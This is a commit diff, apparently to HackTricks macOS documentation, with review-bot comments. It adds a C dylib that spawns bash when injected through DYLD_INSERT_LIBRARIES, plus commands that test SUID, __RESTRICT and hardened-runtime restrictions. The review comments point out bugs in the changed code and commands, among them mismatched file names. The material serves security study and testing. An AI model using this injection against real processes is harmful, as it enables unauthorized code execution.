GITBOOK-3926: change request with no subject merged in GitBook
This commit is contained in:
parent
2b401d3335
commit
3484d7008e
@ -1132,11 +1132,12 @@ In the function **`processRestricted`** the reason of the restriction is set. Ch
|
||||
* Existence of `__RESTRICT/__restrict` section in the macho binary.
|
||||
* The software has entitlements (hardened runtime) without [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables) entitlement or [`com.apple.security.cs.disable-library-validation`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-library-validation).
|
||||
* If the lib is signed with the same certificate as the binary
|
||||
* This will bypass the previous restrictions
|
||||
|
||||
In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS:.
|
||||
In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS.
|
||||
{% endhint %}
|
||||
|
||||
Find a example on how to (ab)use this in:
|
||||
Find a example on how to (ab)use this and check the restrictions in:
|
||||
|
||||
{% content-ref url="dyld_insert_libraries.md" %}
|
||||
[dyld\_insert\_libraries.md](dyld\_insert\_libraries.md)
|
||||
|
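Review bot: the rewritten line "In more updated versions you can find this logic ... (you can remove the ifs related to iOS or simulation as those won't be used in macOS." still never closes the parenthesis it opens; the old line ended in ":." and the replacement only dropped the colon. Suggest ending it "... won't be used in macOS)." Also, the other changed line should read "Find an example on how to (ab)use this and check the restrictions in:" rather than "Find a example".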
@ -12,22 +12,22 @@
|
||||
|
||||
</details>
|
||||
|
||||
### Basic example
|
||||
## Basic example
|
||||
|
||||
**Library to inject** to execute a shell:
|
||||
|
||||
```c
|
||||
// gcc -dynamiclib example.c -o example.dylib
|
||||
// gcc -dynamiclib -o inject.dylib inject.c
|
||||
|
||||
#include <stdio.h>
|
||||
#include <syslog.h>
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
__attribute__((constructor))
|
||||
|
||||
int myconstructor(int argc, const char **argv)
|
||||
{
|
||||
printf("[+] dylib injected in %s\n", argv[0]);
|
||||
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
|
||||
printf("[+] dylib injected in %s\n", argv[0]);
|
||||
execv("/bin/bash", 0);
|
||||
}
|
||||
```
|
||||
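Review bot: `execv("/bin/bash", 0);` passes a NULL argv, so the spawned bash gets no argv[0]; pass a proper NULL-terminated vector, e.g. `char *const bash_argv[] = {"/bin/bash", NULL}; execv("/bin/bash", bash_argv);`. The constructor is also declared `int myconstructor(...)` but has no return statement, so if `execv` fails (as it will whenever dyld has actually honoured the restrictions being tested later on the page) it falls off the end of a non-void function; declare it `void` or add `perror("execv"); return;` after the call. Finally, if both `#include <stdio.h>` lines survive in the new file, one is redundant.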
@ -48,17 +48,56 @@ int main()
|
||||
Injection:
|
||||
|
||||
```bash
|
||||
DYLD_INSERT_LIBRARIES=example.dylib ./hello
|
||||
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
|
||||
```
|
||||
|
||||
### Bigger Scale
|
||||
## Bigger Scale
|
||||
|
||||
If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` executeion).
|
||||
If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` execution).
|
||||
|
||||
```bash
|
||||
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "dylib injected"'
|
||||
```
|
||||
|
||||
## Check restrictions
|
||||
|
||||
### SUID & SGID
|
||||
|
||||
```bash
|
||||
# Make it owned by root and suid
|
||||
sudo chown root hello
|
||||
sudo chmod +s hello
|
||||
# Insert the library
|
||||
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
|
||||
|
||||
# Remove suid
|
||||
sudo chmod -s hello
|
||||
```
|
||||
|
||||
### Section `__RESTRICT` with segment `__restrict`
|
||||
|
||||
```bash
|
||||
gcc -sectcreate __RESTRICT __restrict /dev/null hello.c -o hello-restrict
|
||||
DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict
|
||||
```
|
||||
|
||||
### Hardened runtime
|
||||
|
||||
Create a new certificate in the Keychain and use it to sign the binary:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
codesign -s <cert-name> --option=runtime ./hello
|
||||
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
|
||||
|
||||
codesign -f -s <cert-name> --option=library ./hello
|
||||
DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Will throw an error because signature of binary and library aren't signed by same cert
|
||||
|
||||
codesign -s <cert-name> inject.dylib
|
||||
DYLD_INSERT_LIBRARIES=example.dylib ./hello-signed #Throw an error because an Apple dev certificate is needed
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
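Review bot: in the hardened-runtime block the last two invocations still use `example.dylib` and `./hello-signed`, while the rest of this hunk was renamed to `inject.dylib` and `./hello` (and `./hello` is the file the preceding `codesign` lines sign); as written they would fail because the paths do not exist rather than demonstrating the library-validation error the comments describe. Change both to `DYLD_INSERT_LIBRARIES=inject.dylib ./hello`. The heading "Section `__RESTRICT` with segment `__restrict`" has the terms swapped relative to the command under it: `-sectcreate __RESTRICT __restrict` creates segment `__RESTRICT` containing section `__restrict`, which is what dyld looks for, so the heading should read segment `__RESTRICT` with section `__restrict`. Also `--option=runtime` / `--option=library`: the documented codesign flag is `--options` (or `-o`), e.g. `codesign -s <cert-name> --options runtime ./hello`; worth normalising so the commands copy-paste cleanly.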